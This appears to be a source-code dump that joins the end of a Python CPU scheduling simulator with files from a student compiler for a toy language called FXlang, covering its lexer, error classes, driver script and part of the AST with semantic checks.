self.io_wait_time += self.simulator.env.now() - io_start
def main(cpu_scheduler,quantum,input_file,output_file):
processes = read_workload(file = input_file)
simulator = Simulator(processes = processes, cpu_scheduler = cpu_scheduler, quantum = quantum, ofile = output_file)
simulator.run()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description = "CPU and I/O scheduling simulator")
parser.add_argument("--cpu-scheduler", choices = ["fcfs", "rr", "sjf", "srtf"], required = True, help = "CPU scheduler")
parser.add_argument("--quantum", type=float, default = None, help = "Quantum paramater (required only by round robin cpu scheduler)")
parser.add_argument("--input-file", metavar = "FILE", default = None, help = "Input file, if it is not the data is read from stdin")
parser.add_argument("--output-file", metavar = "FILE", default = None, help = "Output file, if it is not set the data is printed to stdout")
args = parser.parse_args(sys.argv[1:])
output_file = sys.stdout if args.output_file is None else args.output_file
processes = read_workload(file = args.input_file)
simulator = Simulator(processes = processes, cpu_scheduler = args.cpu_scheduler, quantum = args.quantum, ofile = args.output_file)
simulator.run()
|
[
"/gen_workload.py",
"/run_tests.py",
"/simulator.py"
] |
00riddle00/BSc3-Compilers
|
from abc import abstractmethod
from pprint import pprint
from termcolor import cprint
user_friendly_names = {
'KW_INCLUDE': '@',
'KW_FN': 'fx',
'KW_FN_RET_ARROW': '==',
'KW_FN_IN': 'in',
'KW_FN_OUT': 'out',
'KW_IF': 'if',
'KW_ELIF': 'elif',
'KW_ELSE': 'else',
'KW_FOR': 'for',
'KW_WHILE': 'while',
'KW_BREAK': 'break',
'KW_CONTINUE': 'continue',
'KW_RETURN': 'return',
'KW_VOID': 'void',
'KW_INT': 'int',
'KW_FLOAT': 'float',
'KW_BOOL': 'bool',
'KW_CHAR': 'char',
'KW_STR': 'string',
'KW_STRUCT': 'struct',
'KW_NULL': 'NULL',
'KW_TRUE': 'True',
'KW_FALSE': 'False',
'KW_AND': 'AND',
'KW_OR': 'OR',
'IDENT': 'identifier',
'LIT_INT': 'int literal',
'LIT_FLOAT': 'float literal',
'LIT_CHAR': 'char literal',
'LIT_STR': 'string literal',
'OP_G': '',
'OP_GE': '=',
'OP_L': '',
'OP_LE': '=',
'OP_IS_EQ': '==',
'OP_IS_NEQ': '!=',
'OP_SUM': '+',
'OP_SUB': '-',
'OP_MUL': '*',
'OP_DIV': '/',
'OP_MOD': '%',
'OP_NOT': '!',
'OP_INCR': '++',
'OP_DECR': '--',
'OP_ASSIGN_EQ': '=',
'OP_ASSIGN_SUM': '+=',
'OP_ASSIGN_SUB': '-=',
'OP_ASSIGN_MUL': '*=',
'OP_ASSIGN_DIV': '/=',
'OP_ASSIGN_MOD': '%=',
'OP_PTR': '$',
'OP_PTR_ADDR': '&',
'OP_DOT_ACCESS_MEMBER': '.',
'OP_PTR_ACCESS_MEMBER': '-',
'OP_PAREN_O': '(',
'OP_PAREN_C': ')',
'OP_BRACE_O': '{',
'OP_BRACE_C': '}',
'OP_BRACKET_O': '[',
'OP_BRACKET_C': ']',
'OP_SEMICOLON': ';',
'OP_COMMA': ',',
}
class CompilerError(BaseException):
def __init__(self, msg, file=None, line=None, pos=None):
self.msg = msg
self.file = file
self.line = line
self.pos = pos
@abstractmethod
def print_err(self):
pass
class SemanticError(CompilerError):
def print_err(self):
# todo move this print_red to a sep fn
cprint(f'SemanticERROR: {self.file}:{self.line}:{self.pos} {self.msg}', 'red', attrs=['bold'])
class InputError(CompilerError):
def print_err(self):
cprint(f'[InputERROR] [{self.msg}]', 'red', attrs=['bold'])
class LexerError(CompilerError):
def print_err(self):
cprint(f'LexerERROR: {self.file}:{self.line}:{self.pos} {self.msg}', 'red', attrs=['bold'])
class LexerDebugError(LexerError):
def __init__(self, msg, file=None, line=None, pos=None, state=None, curr_char=None, buffer=None):
super().__init__(msg, file, line, pos)
self.state = state
self.curr_char = curr_char
self.buffer = buffer
def print_err(self):
top_right_delim = 33 * '!'
top_left_delim = 33 * '!'
v_delim = 5 * '!'
bottom_delim = 81 * '!'
print(f'{top_left_delim} [Lexer error] {top_right_delim}')
print(f'{v_delim} [file={self.file}: line={self.line}: position={self.pos}]')
print(f'{v_delim} [Error message]: {self.msg}'),
if self.buffer:
print(f'{v_delim} [Item being lexed (pretty print)]:'),
pprint(self.buffer + self.curr_char)
print(f'{v_delim} [state]: {self.state}')
print(f'{v_delim} [output so far]:')
print(bottom_delim)
class ParserError(CompilerError):
def __init__(self, msg, file=None, line=None, pos=None, exp_token=None, curr_token=None):
super().__init__(msg, file, line, pos)
self.exp_token = exp_token
self.curr_token = curr_token
def print_err(self):
exp = self.exp_token
if exp in user_friendly_names.keys():
exp = user_friendly_names[exp]
cprint(f'ParserERROR: {self.file}:{self.line}:{self.pos} '
f'expected({exp}), found({user_friendly_names[self.curr_token]})',
'red', attrs=['bold'])
class ParserDebugError(ParserError):
pass
class InternalError(CompilerError):
def __init__(self, msg):
super().__init__(msg)
def print_err(self):
cprint(f'InternalERROR: {self.msg}', 'yellow', attrs=['bold'])
--- FILE SEPARATOR ---
from .lexer import Input, Lexer, Token
--- FILE SEPARATOR ---
from errors import LexerError, LexerDebugError, InputError
from termcolor import cprint
# List of all lexemes
# <KW_INCLUDE> // not implemented
# <KW_FN>
# <KW_FN_RET_ARROW>
# <KW_FN_IN>
# <KW_FN_OUT>
# <KW_IF>
# <KW_ELIF>
# <KW_ELSE>
# <KW_FOR>
# <KW_WHILE>
# <KW_BREAK>
# <KW_CONTINUE>
# <KW_RETURN>
# <KW_VOID>
# <KW_INT>
# <KW_FLOAT>
# <KW_BOOL>
# <KW_CHAR>
# <KW_STR>
# <KW_STRUCT>
# <KW_NULL>
# <KW_TRUE>
# <KW_FALSE>
# <KW_AND>
# <KW_OR>
# <IDENT>
# <LIT_INT>
# <LIT_FLOAT>
# <LIT_CHAR>
# <LIT_STR>
# <OP_G>
# <OP_GE>
# <OP_L>
# <OP_LE>
# <OP_IS_EQ>
# <OP_IS_NEQ>
# <OP_SUM>
# <OP_SUB>
# <OP_MUL>
# <OP_DIV>
# <OP_MOD>
# <OP_NOT>
# <OP_INCR>
# <OP_DECR>
# <OP_ASSIGN_EQ>
# <OP_ASSIGN_SUM>
# <OP_ASSIGN_SUB>
# <OP_ASSIGN_MUL>
# <OP_ASSIGN_DIV>
# <OP_ASSIGN_MOD>
# <OP_PTR>
# <OP_PTR_ADDR>
# <OP_DOT_ACCESS_MEMBER>
# <OP_PTR_ACCESS_MEMBER> // not implemented
# <OP_PAREN_O>
# <OP_PAREN_C>
# <OP_BRACE_O>
# <OP_BRACE_C>
# <OP_BRACKET_O>
# <OP_BRACKET_C>
# <OP_SEMICOLON>
# <OP_COMMA>
KEYWORDS = {
'fx': 'KW_FN',
# 'in': 'KW_FN_IN', # see this inbuilt fn name just as ident
# 'out': 'KW_FN_OUT', # see this inbuilt fn name just as ident
'if': 'KW_IF',
'elif': 'KW_ELIF',
'else': 'KW_ELSE',
'for': 'KW_FOR',
'while': 'KW_WHILE',
'break': 'KW_BREAK',
'continue': 'KW_CONTINUE',
'return': 'KW_RETURN',
'==>': 'KW_FN_RET_ARROW',
'void': 'KW_VOID',
'int': 'KW_INT',
'float': 'KW_FLOAT',
'bool': 'KW_BOOL',
'char': 'KW_CHAR',
'string': 'KW_STR',
'struct': 'KW_STRUCT',
'NULL': 'KW_NULL',
'True': 'KW_TRUE',
'False': 'KW_FALSE',
'AND': 'KW_AND',
'OR': 'KW_OR',
}
class Input:
name: str
text: str
offset: int
offset_prev_line: int
offset_token_start: int
pos: int
curr_ln: int
size: int
def __init__(self, filename):
if not type(filename) == str:
raise InputError(f"Wrong argument type passed to Input constructor: exp=str, got={type(filename)}")
self.name = filename
try:
with open(self.name) as f:
self.text = ''.join(f.readlines())
except IOError as e:
raise InputError(e)
self.size = len(self.text)
self.curr_ln = 1
self.offset = 0
self.offset_prev_line = 0
self.offset_token_start = 0
def read_char(self):
char = self.text[self.offset]
self.offset += 1
return char
def reverse_read(self, delta=1):
self.offset -= delta
def is_input_read(self):
return self.offset >= self.size
def next_line(self):
self.offset_prev_line = self.offset
self.curr_ln += 1
self.offset_token_start = 0
def get_char_pos(self):
return self.offset - self.offset_prev_line
def get_char_info(self):
return [self.name, self.curr_ln, self.get_char_pos()]
class Token:
type_: str
value: str
file: str
line_no: int
pos: int
def __init__(self, type_, value, file, line_no, pos):
self.type = type_
self.value = value
self.file = file
self.line_no = line_no
self.pos = pos
def get_char_info(self):
return [self.file, self.line_no, self.pos]
class Lexer:
inputs: list
curr_input: Input
buffer: str
state: str
tokens: list
running: bool
curr_char: str
def __init__(self, inputs) -> None:
if not type(inputs) == list:
self.err(
f"Wrong argument type passed to Lexer constructor: exp=[Input, Input, ...], got={type(inputs)}")
for i, _input in enumerate(inputs):
if not type(_input) == Input:
self.err(
f'Input list has an element (index={i}) of incorrect type: exp=Input, got={type(_input)}')
self.inputs = inputs
self.buffer = ''
self.state = 'START'
self.tokens = []
self.token_start_ln = 1
self.running = True
self.curr_char = ''
def add(self):
self.buffer += self.curr_char
def begin_token(self, new_state):
self.curr_input.offset_token_start = self.curr_input.get_char_pos()
self.token_start_ln = self.curr_input.curr_ln
self.state = new_state
def complete_ident(self):
if self.buffer in KEYWORDS:
token_type = KEYWORDS[self.buffer]
self.buffer = ''
else:
token_type = 'IDENT'
self.complete_token(token_type, delta=1)
def complete_token_at_once(self, token_type):
self.curr_input.offset_token_start = self.curr_input.get_char_pos()
self.complete_token(token_type)
def complete_token(self, token_type, delta=0):
self.tokens.append(
Token(token_type, self.buffer, self.curr_input.name, self.curr_input.curr_ln,
self.curr_input.offset_token_start))
self.buffer = ''
self.state = 'START'
if delta:
self.curr_input.reverse_read(delta)
def lex_all(self):
for _input in self.inputs:
self.curr_input = _input
# uncomment for debugging
# print(81 * '#')
# print(f'[file]: {self.curr_input.name}')
# pprint(self.curr_input.text)
# print(81 * '#')
while self.running and not self.curr_input.is_input_read():
self.curr_char = self.curr_input.read_char()
self.lex_char()
self.curr_char = 'EOF'
if self.state == 'START':
self.complete_token_at_once('EOF')
elif self.state in ('COMMENT_ML', 'COMMENT_ML_MINUS_1', 'COMMENT_ML_MINUS_2'):
self.err('unterminated comment')
elif self.state in ('LIT_FLOAT_E', 'LIT_FLOAT_E_SIGN'):
self.err('unterminated float expression')
elif self.state in ('LIT_CHAR', 'LIT_CHAR_ADDED'):
self.err('unterminated char')
elif self.state == 'LIT_STR':
self.err('unterminated string')
elif self.state in ('LIT_CHAR_ESC', 'LIT_STR_ESCAPE'):
self.err('unterminated escape symbol')
else:
self.lex_char()
self.complete_token_at_once('EOF')
def lex_start(self):
if self.is_ident_head():
self.add()
self.begin_token('IDENT')
elif self.is_digit():
self.add()
self.begin_token('LIT_INT')
elif self.curr_char == '.':
self.add()
self.begin_token('LIT_FLOAT')
elif self.curr_char == "'":
self.begin_token('LIT_CHAR')
elif self.curr_char == '"':
self.begin_token('LIT_STR')
elif self.curr_char == '+':
self.begin_token('OP_SUM')
elif self.curr_char == '-':
self.begin_token('OP_SUB')
elif self.curr_char == '*':
self.begin_token('OP_MUL')
elif self.curr_char == '/':
self.begin_token('OP_DIV')
elif self.curr_char == '%':
self.begin_token('OP_MOD')
elif self.curr_char == '<':
self.begin_token('OP_L')
elif self.curr_char == '>':
self.begin_token('OP_G')
elif self.curr_char == '=':
self.begin_token('OP_ASSIGN_EQ')
elif self.curr_char == '!':
self.begin_token('OP_NOT')
elif self.curr_char == '(':
self.complete_token_at_once('OP_PAREN_O')
elif self.curr_char == ')':
self.complete_token_at_once('OP_PAREN_C')
elif self.curr_char == '{':
self.complete_token_at_once('OP_BRACE_O')
elif self.curr_char == '}':
self.complete_token_at_once('OP_BRACE_C')
elif self.curr_char == '[':
self.complete_token_at_once('OP_BRACKET_O')
elif self.curr_char == ']':
self.begin_token('OP_BRACKET_C')
elif self.curr_char == ';':
self.complete_token_at_once('OP_SEMICOLON')
elif self.curr_char == ',':
self.complete_token_at_once('OP_COMMA')
elif self.curr_char == '$':
self.complete_token_at_once('OP_PTR')
elif self.curr_char == '&':
self.complete_token_at_once('OP_PTR_ADDR')
elif self.curr_char == '@':
self.begin_token('INCLUDE')
elif self.curr_char == '#':
self.state = 'COMMENT_START'
elif self.curr_char == ' ':
pass # ignore
elif self.curr_char == '\n':
self.curr_input.next_line()
elif self.curr_char == '\t':
pass # ignore
elif self.curr_char == '\r':
pass # ignore
else:
self.err('invalid character, usable only as char or inside a string')
def lex_char(self):
if self.state == 'START':
self.lex_start()
elif self.state == 'IDENT':
self.lex_ident()
elif self.state == 'STRUCT_MEMBER_IDENT':
self.lex_struct_member_ident()
elif self.state == 'LIT_INT':
self.lex_lit_int()
elif self.state == 'LIT_FLOAT':
self.lex_lit_float()
elif self.state == 'LIT_FLOAT_E':
self.lex_lit_float_e()
elif self.state == 'LIT_FLOAT_E_SIGN':
self.lex_lit_float_e_sign()
elif self.state == 'LIT_FLOAT_W_E':
self.lex_lit_float_w_e()
elif self.state == 'LIT_CHAR':
self.lex_lit_char()
elif self.state == 'LIT_CHAR_ESCAPE':
self.lex_lit_char_escape()
elif self.state == 'LIT_CHAR_ADDED':
self.lex_lit_char_added()
elif self.state == 'LIT_STR':
self.lex_lit_str()
elif self.state == 'LIT_STR_ESCAPE':
self.lex_lit_str_escape()
elif self.state == 'OP_SUM':
self.lex_op_sum()
elif self.state == 'OP_SUB':
self.lex_op_sub()
elif self.state == 'OP_MUL':
self.lex_op_mul()
elif self.state == 'OP_DIV':
self.lex_op_div()
elif self.state == 'OP_MOD':
self.lex_op_mod()
elif self.state == 'OP_L':
self.lex_op_l()
elif self.state == 'OP_G':
self.lex_op_g()
elif self.state == 'OP_ASSIGN_EQ':
self.lex_op_assign_eq()
elif self.state == 'OP_IS_EQ':
self.lex_op_is_eq()
elif self.state == 'OP_NOT':
self.lex_op_not()
elif self.state == 'OP_BRACKET_C':
self.lex_op_bracket_close()
elif self.state == 'OP_PAREN_C':
self.lex_op_paren_close()
elif self.state == 'INCLUDE':
self.lex_include()
elif self.state == 'COMMENT_START':
self.lex_comment_start()
elif self.state == 'COMMENT_SL':
self.lex_comment_sl()
elif self.state == 'COMMENT_SL_PLUS_2':
self.lex_comment_sl_plus_2()
elif self.state == 'COMMENT_ML':
self.lex_comment_ml()
elif self.state == 'COMMENT_ML_MINUS_1':
self.lex_comment_ml_minus_1()
elif self.state == 'COMMENT_ML_MINUS_2':
self.lex_comment_ml_minus_2()
else:
self.err(f'invalid state {self.state}')
# lex identifiers
def lex_ident(self):
if self.is_letter():
self.add()
elif self.is_digit():
self.add()
elif self.curr_char == '_':
self.add()
elif self.curr_char == '.':
self.complete_token('IDENT')
self.add()
self.state = 'STRUCT_MEMBER_IDENT'
else:
self.complete_ident()
def lex_struct_member_ident(self):
if self.is_ident_head():
self.complete_token('OP_DOT_ACCESS_MEMBER')
self.add()
self.state = 'IDENT'
else:
self.err('invalid struct member ident')
# lex type literals
def lex_lit_int(self):
if self.is_digit():
self.add()
elif self.curr_char == '.':
self.add()
self.state = 'LIT_FLOAT'
elif self.is_ident_head():
self.err('invalid int suffix')
else:
self.complete_token('LIT_INT', delta=1)
def lex_lit_float(self):
if self.is_digit():
self.add()
elif self.curr_char == 'e':
self.add()
self.state = 'LIT_FLOAT_E'
else:
self.complete_token('LIT_FLOAT', delta=1)
def lex_lit_float_e(self):
if self.is_digit():
self.add()
self.state = 'LIT_FLOAT_W_E'
elif self.curr_char in ['+', '-']:
self.add()
self.state = 'LIT_FLOAT_E_SIGN'
else:
self.err('Invalid float exponent')
def lex_lit_float_e_sign(self):
if self.is_digit():
self.add()
self.state = 'LIT_FLOAT_W_E'
else:
self.err('Invalid float exponent')
def lex_lit_float_w_e(self):
if self.is_digit():
self.add()
else:
self.complete_token('LIT_FLOAT', delta=1)
def lex_lit_char(self):
if self.curr_char == "'":
self.complete_token('LIT_CHAR')
elif self.curr_char == '\\':
self.state = 'LIT_CHAR_ESCAPE'
elif self.curr_char in ['\n', '\r', '\t']:
self.err('char type cannot contain newlines, tabstops or'
' carriage returns')
else:
self.add()
self.state = 'LIT_CHAR_ADDED'
def lex_lit_char_escape(self):
if self.curr_char == "'":
self.buffer += "'"
elif self.curr_char == '\\':
self.buffer += '\\'
elif self.curr_char == 'n':
self.buffer += '\\n'
elif self.curr_char == 'r':
self.buffer += '\\r'
elif self.curr_char == 't':
self.buffer += '\\t'
else:
self.buffer += "\\"
self.err(f'invalid escape sequence used in a char: \\{self.curr_char}')
self.state = 'LIT_CHAR_ADDED'
def lex_lit_char_added(self):
if self.curr_char == "'":
self.complete_token('LIT_CHAR')
else:
self.err('char type cannot consist of multiple chars')
def lex_lit_str(self):
if self.curr_char == '"':
self.complete_token('LIT_STR')
elif self.curr_char == '\\':
self.state = 'LIT_STR_ESCAPE'
elif self.curr_char == '\n':
self.add()
self.curr_input.next_line()
else:
self.add()
def lex_lit_str_escape(self):
if self.curr_char == '"':
self.buffer += '"'
elif self.curr_char == "\\":
self.buffer += "\\"
elif self.curr_char == 'n':
self.buffer += "\n"
elif self.curr_char == 'r':
self.buffer += "\r"
elif self.curr_char == 't':
self.buffer += "\t"
else:
self.buffer += "\\"
self.err(f'invalid escape sequence used in a string: \\{self.curr_char}')
self.state = 'LIT_STR'
# lex operators
def lex_op_sum(self):
if self.curr_char == '+':
self.complete_token('OP_INCR')
elif self.curr_char == '=':
self.complete_token('OP_ASSIGN_SUM')
elif self.is_digit():
self.add()
self.state = 'LIT_INT'
else:
self.complete_token('OP_SUM', delta=1)
def lex_op_sub(self):
if self.curr_char == '-':
self.complete_token('OP_DECR')
elif self.curr_char == '=':
self.complete_token('OP_ASSIGN_SUB')
elif self.is_digit():
self.add()
self.state = 'LIT_INT'
else:
self.buffer = ''
self.complete_token('OP_SUB', delta=1)
def lex_op_mul(self):
if self.curr_char == '=':
self.complete_token('OP_ASSIGN_MUL')
else:
self.complete_token('OP_MUL', delta=1)
def lex_op_div(self):
if self.curr_char == '=':
self.complete_token('OP_ASSIGN_DIV')
else:
self.complete_token('OP_DIV', delta=1)
def lex_op_mod(self):
if self.curr_char == '=':
self.complete_token('OP_ASSIGN_MOD')
else:
self.complete_token('OP_MOD', delta=1)
def lex_op_l(self):
if self.curr_char == '=':
self.complete_token('OP_LE')
else:
self.complete_token('OP_L', delta=1)
def lex_op_g(self):
if self.curr_char == '=':
self.complete_token('OP_GE')
else:
self.complete_token('OP_G', delta=1)
def lex_op_assign_eq(self):
if self.curr_char == '=':
self.state = 'OP_IS_EQ'
else:
self.complete_token('OP_ASSIGN_EQ', delta=1)
def lex_op_is_eq(self):
if self.curr_char == '>':
self.complete_token(KEYWORDS['==>'])
else:
self.complete_token('OP_IS_EQ', delta=1)
def lex_op_not(self):
if self.curr_char == '=':
self.complete_token('OP_IS_NEQ')
else:
self.complete_token('OP_NOT', delta=1)
def lex_op_bracket_close(self):
self.complete_token('OP_BRACKET_C')
if self.curr_char == '.':
self.add()
self.state = 'STRUCT_MEMBER_IDENT'
def lex_op_paren_close(self):
self.complete_token('OP_PAREN_C')
if self.curr_char == '.':
self.add()
self.state = 'STRUCT_MEMBER_IDENT'
# lex include keyword
def lex_include(self):
if self.curr_char == '\n':
self.curr_input.next_line()
self.state = 'START'
new_input = Input(self.buffer)
self.buffer = ''
self.inputs.append(new_input)
else:
self.add()
# lex comments
def lex_comment_start(self):
if self.curr_char == '\n':
self.curr_input.next_line()
self.state = 'START'
elif self.curr_char == '#':
self.state = 'COMMENT_SL_PLUS_2'
else:
self.state = 'COMMENT_SL'
def lex_comment_sl(self):
if self.curr_char == '\n':
self.curr_input.next_line()
self.state = 'START'
else:
pass # ignore
def lex_comment_sl_plus_2(self):
if self.curr_char == '\n':
self.curr_input.next_line()
self.state = 'START'
elif self.curr_char == '#':
self.state = 'COMMENT_ML'
else:
self.state = 'COMMENT_SL'
def lex_comment_ml(self):
if self.curr_char == '#':
self.state = 'COMMENT_ML_MINUS_1'
elif self.curr_char == '\n':
self.curr_input.next_line()
else:
pass # ignore
def lex_comment_ml_minus_1(self):
if self.curr_char == '#':
self.state = 'COMMENT_ML_MINUS_2'
elif self.curr_char == '\n':
self.curr_input.next_line()
self.state = 'COMMENT_ML'
else:
self.state = 'COMMENT_ML'
def lex_comment_ml_minus_2(self):
if self.curr_char == '#':
self.state = 'START'
elif self.curr_char == '\n':
self.curr_input.next_line()
self.state = 'COMMENT_ML'
else:
self.state = 'COMMENT_ML'
# print tokens
def dump_tokens(self):
cprint(f'{"ID":>3}| {"LN":>3}| {"TYPE":<22} | {"VALUE":<14}', 'cyan', attrs=['bold'])
for index, token in enumerate(self.tokens):
cprint(f'{index:>3}|'
f' {token.line_no:>3}|'
f' {token.type:<22} |'
f' {token.value:<14}',
'green', attrs=['bold'])
# helper functions
def is_letter(self):
c = self.curr_char
return len(c) == 1 and (ord(c) in range(ord('A'), ord('Z') + 1) or ord(c) in range(ord('a'), ord('z') + 1))
def is_ident_head(self):
if self.curr_char == '_' or self.is_letter():
return True
else:
return False
def is_digit(self):
return len(self.curr_char) == 1 and ord(self.curr_char) in range(ord('0'), ord('9') + 1)
def err(self, msg, debug=False):
if debug:
raise LexerDebugError(msg, *self.curr_input.get_char_info(), self.state, self.curr_char, self.buffer)
else:
raise LexerError(msg, *self.curr_input.get_char_info())
--- FILE SEPARATOR ---
from sys import argv
from lexer import Input, Lexer
from parser import Parser, ASTPrinter, Scope
from errors import LexerError, ParserError, InputError, SemanticError, InternalError
samples_dir = 'FXlang_samples'
file_to_lex = f'{samples_dir}/tmp.fx'
if len(argv) == 2:
file_to_lex = f'{samples_dir}/{argv[1]}'
try:
_input = Input(file_to_lex)
lexer = Lexer([_input])
lexer.lex_all()
lexer.dump_tokens()
parser = Parser(_input, lexer.tokens)
root = parser.parse_program()
printer = ASTPrinter()
printer.print('root', root)
root_scope = Scope()
root.resolve_names(root_scope)
root.check_types()
# todo wrap in CompilerError
except InputError as ie:
ie.print_err()
except LexerError as le:
le.print_err()
except ParserError as pe:
pe.print_err()
except SemanticError as se:
se.print_err()
except InternalError as ie:
ie.print_err()
--- FILE SEPARATOR ---
from .parser import Parser
from .ast_printer import ASTPrinter
from .ast import Scope
--- FILE SEPARATOR ---
from lexer import Token
from errors import SemanticError, InternalError
from termcolor import cprint
# make global variable
# curr_stack_slot = 0
def deb(msg):
print(msg)
def semantic_error(message, token=None):
line_no = token.line_no if (token and token.line_no) else '?'
print(f'???:{line_no}: semantic error: {message}')
def semantic_error3(msg, token):
info = token.get_char_info()
file = info[0]
line = info[1]
pos = info[2]
cprint(f'SemanticERROR: {file}:{line}:{pos} {msg}', 'red', attrs=['bold'])
# todo remove additional unify function and stupid error codes
def unify_types(type_0, type_1, token=None):
err = unify(type_0, type_1)
# todo what does this do?
if err == 0:
return True
elif err == 1:
semantic_error(f'type mismatch: expected({type_0.unwrap()}), got({type_1.unwrap()})')
elif err == 2:
# todo this error intersects with the logic of type being able to participate in certain
# ...todo operation, ex bool cannot be used in arithmetic, cannot compare values, etc.
semantic_error3(f'type kind mismatch: expected({type_0.kind}), got({type_1.kind})', token)
# Node.check_type_eq() <- gal i vidu ikelti?
def unify(type_0, type_1):
# def unify_types(type_0, type_1, token=None):
# todo error?
if not type_0 or not type_1:
return 0
elif type_0.__class__ != type_1.__class__:
return 1
# cia jau zinome kad klases sutampa (TypePrim?)
elif isinstance(type_0, TypePointer) and isinstance(type_1, TypePointer):
return unify(type_0.inner, type_1.inner)
elif isinstance(type_0, TypePrim) and isinstance(type_1, TypePrim):
if type_0.kind != type_1.kind:
return 2
else:
return 0
else:
raise InternalError('unreachable')
class Scope:
def __init__(self, parent_scope=None):
self.members = {}
self.parent_scope = parent_scope
def add(self, name, node):
if not isinstance(name, Token) or not isinstance(node, Node):
raise TypeErr
# if node.respond_to?(:stack_slot):
# node.stack_slot = $curr_stack_slot
# $curr_stack_slot += 1
# end
# todo maybe name.value is not among keys() at all (?)
if name.value not in self.members.keys() or not self.members[name.value]:
self.members[name.value] = node
else:
semantic_error3(f'duplicate variable: {name.value}', name)
def resolve(self, name):
if not isinstance(name, Token):
# todo raise normal error
raise TypeErr
if name.value in self.members.keys():
# todo check for None/False
node = self.members[name.value]
return node
elif self.parent_scope:
# todo return?
return self.parent_scope.resolve(name)
else:
# todo print the same undeclared variable only once, with all its usages
semantic_error3(f'undeclared variable: {name.value}', name)
# return nil
# abstract
# virtual Type* check_types() = 0;
class Node(object):
def __init__(self, parent=None):
self.parent = parent
self.target_node = None
pass
def unwrap(self):
return self.__class__.__name__
def has_address(self):
return False
def is_mutable(self):
return False
# def allocate_slots
# end
# def check_types
# raise 'not implemented %s' % [self.class]
# end
# def compile(pw)
# raise 'not implemented %s' % [self.class]
# end
#
# def is_const?
# true
# end
# def output(indent, str)
# puts("#{' ' * indent}#{str}")
# end
# def print(indent=0)
# output(indent, "?????")
# end
def resolve_names(self, scope):
# raise NotImplementedError.new
raise InternalError(f'resolve names not implemented for: {self.__class__.__name__}')
def add_children(self, *children):
for child in children:
if not child:
pass # ignore
elif type(child) == list:
for ch in child:
self.add_children(ch)
elif isinstance(child, Node):
child.parent = self
else:
raise InternalError('bad child')
# or ancestor_class = node_class
# or ancestor_fn
def find_ancestor(self, ancestor_class):
current_node = self.parent
while current_node:
# or ancestor_class = DefFn
if isinstance(current_node, ancestor_class):
return current_node
else:
current_node = current_node.parent
def ancestor_loop(self):
current_node = self.parent
while current_node:
if isinstance(current_node, StmtWhile) or isinstance(current_node, StmtFor):
return current_node
else:
current_node = current_node.parent
return current_node
def print_node(self, p):
print(f'print not implemented for {self.__class__}')
def check_types(self):
# raise NotImplementedError
raise InternalError(f'check_types not implemented for {self.__class__}')
class Program(Node):
# attr_reader :decls
# or attr_accessor :decls
# std::vector<Decl*>
def __init__(self, decls, eof):
self.add_children(*decls)
self.decls = decls
self.eof = eof
super().__init__()
def print_node(self, p):
p.print('decls', self.decls)
def resolve_names(self, scope):
if not self.decls:
raise SemanticError('no "main" function in a program', *self.eof.get_char_info())
for decl in self.decls:
scope.add(decl.name, decl)
if 'main' not in scope.members.keys():
# todo is it correct to show token pos of last decl name?
semantic_error3('no "main" function in a program', decl.name)
for decl in self.decls:
decl.resolve_names(scope)
# todo return value?
def check_types(self):
for decl in self.decls:
if decl.name.value == 'main':
if not decl.ret_type.kind == 'int':
# todo use type token instead of fn name in error printing
semantic_error3('incorrect "main" signature - main function should return int', decl.name)
decl.check_types()
# abstract
class Decl(Node):
def __init__(self):
pass
super().__init__()
class DeclFn(Decl):
# attr_reader :name, :params, :ret_type, :body
# attr_accessor :name
# attr_accessor :params
# attr_accessor :ret_type
# attr_accessor :body
# attr_reader :entry_label
# attr_reader :builtin
num_locals: int
local_count: int
# todo params -> *args?
def __init__(self, name, params, ret_type, body):
self.add_children(params + [ret_type] + [body])
self.name = name
self.params = params
self.ret_type = ret_type
self.body = body
# todo remove?
self.type = None
# todo whatis?
# self.entry_label = Label.new
super().__init__()
def print_node(self, p):
p.print('name', self.name)
p.print('params', self.params)
p.print('ret_type', self.ret_type)
p.print('body', self.body)
def resolve_names(self, scope):
# scope.add(@name, self) 2017 buvo
inner_scope = Scope(scope)
# curr_stack_slot = 0 # todo or $slot_index
if self.name.value == 'main':
if self.params:
semantic_error3('incorrect "main" signature - main function should not have any parameters', self.name)
for param in self.params:
inner_scope.add(param.name, param)
# self.num_locals = curr_stack_slot
# self.local_count = curr_stack_slot - len(self.params)
self.body.resolve_names(inner_scope)
def check_types(self):
for param in self.params:
param.check_types()
self.body.check_types()
class Param(Node):
# attr_accessor :slot_index
def __init__(self, name, type_):
# todo is this add_children needed here?
self.add_children(type_)
self.name = name
self.type = type_
super().__init__()
def print_node(self, p):
p.print('name', self.name)
p.print('type', self.type)
def check_types(self):
if not self.type.has_value():
# todo show pos of param type not of param name
semantic_error3(f'parameter\'s type cannot be void or pointer to void', self.name)
class StmtBlock(Node):
def __init__(self, stmts):
self.add_children(stmts)
# self.add_children(*stmts)
self.stmts = stmts
super().__init__()
# def empty?
# @statements.empty?
# end
def print_node(self, p):
p.print('stmts', self.stmts)
def resolve_names(self, scope):
inner_scope = Scope(scope) # or child scope
for stmt in self.stmts:
stmt.resolve_names(inner_scope)
def check_types(self):
for stmt in self.stmts:
stmt.check_types()
# abstract
class Stmt(Node):
def __init__(self):
pass
super().__init__()
class IfBranch(Node):
def __init__(self, cond, body):
self.add_children(cond, body)
self.cond = cond
self.body = body
super().__init__()
def print_node(self, p):
p.print('cond', self.cond)
p.print('body', self.body)
def resolve_names(self, scope):
self.cond.resolve_names(scope)
self.body.resolve_names(scope)
def check_types(self):
self.cond.check_types()
self.body.check_types()
class StmtIf(Stmt):
def __init__(self, branches, else_block=None):
self.add_children(branches, else_block)
self.branches = branches
self.else_block = else_block
super().__init__()
def print_node(self, p):
for ind in range(len(self.branches)):
p.print(f'branch[{ind}]', self.branches[ind])
if self.else_block:
p.print(f'else', self.else_block)
def resolve_names(self, scope):
for branch in self.branches:
branch.resolve_names(scope)
if self.else_block:
self.else_block.resolve_names(scope)
def check_types(self):
for branch in self.branches:
cond_type = branch.cond.check_types()
unify_types(TYPE_BOOL, cond_type, branch.cond.get_token())
branch.body.check_types()
if self.else_block:
self.else_block.check_types()
class StmtFor(Stmt):
def __init__(self, for_init, for_cond, for_step, for_body):
self.add_children(for_init, for_cond, for_step, for_body)
self.for_init = for_init
self.for_cond = for_cond
self.for_step = for_step
self.for_body = for_body
super().__init__()
def print_node(self, p):
p.print('init', self.for_init)
p.print('cond', self.for_cond)
p.print('step', self.for_step)
p.print('body', self.for_body)
def resolve_names(self, scope):
self.for_init.resolve_names(scope)
self.for_cond.resolve_names(scope)
self.for_step.resolve_names(scope)
self.for_body.resolve_names(scope)
def check_types(self):
self.for_init.check_types()
